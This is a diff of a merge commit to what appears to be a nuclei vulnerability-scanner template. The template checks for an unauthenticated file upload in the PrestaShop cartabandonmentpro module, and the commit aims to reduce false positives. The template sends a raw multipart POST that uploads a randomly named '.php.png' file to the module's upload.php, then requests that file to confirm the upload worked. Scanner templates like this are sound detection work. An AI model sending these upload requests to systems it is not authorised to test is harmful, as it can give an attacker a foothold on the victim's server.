Merge pull request #9696 from projectdiscovery/fix-fp-carbon

fix-fp

http/vulnerabilities/prestashop/prestashop-cartabandonmentpro-file-upload.yaml

@@ -18,11 +18,10 @@ variables:
   filename: '{{rand_base(7, "abc")}}'
   title: '{{rand_base(7, "abc")}}'
 
-
 http:
   - raw:
       - |
-        POST /modules/{{paths}}/upload.php HTTP/1.1
+        POST /modules/cartabandonmentpro/upload.php HTTP/1.1
         Host: {{Hostname}}
         Content-Type: multipart/form-data; boundary=xYzZY
 
@@ -36,23 +35,16 @@ http:
 
         --xYzZY--
 
-    payloads:
-      paths:
-        - 'cartabandonmentpro'
-        - 'cartabandonmentproOld'
+      - |
+        GET /modules/cartabandonmentpro/uploads/{{filename}}.php.png HTTP/1.1
+        Host: {{Hostname}}
 
-    stop-at-first-match: true
-    host-redirects: true
-    max-redirects: 3
-
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - "{{filename}}.php.png"
+      - type: dsl
+        dsl:
+          - 'contains(header_2, "image/png")'
+          - 'contains(body_1, "{{filename}}.php.png")'
+          - 'status_code_1 == 200 && status_code_2 == 200'
+        condition: and
 
-      - type: status
-        status:
-          - 200
-# digest: 490a0046304402206cd9c0818aa36d2324bdd68ea91572b784f5d8ba039eb80723118081997fb883022072073af9c96011fb764121a837e5d489c22d27efd3498085aab2a9269088c147:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402206cd9c0818aa36d2324bdd68ea91572b784f5d8ba039eb80723118081997fb883022072073af9c96011fb764121a837e5d489c22d27efd3498085aab2a9269088c147:922c64590222798bb761d5b6d8e72950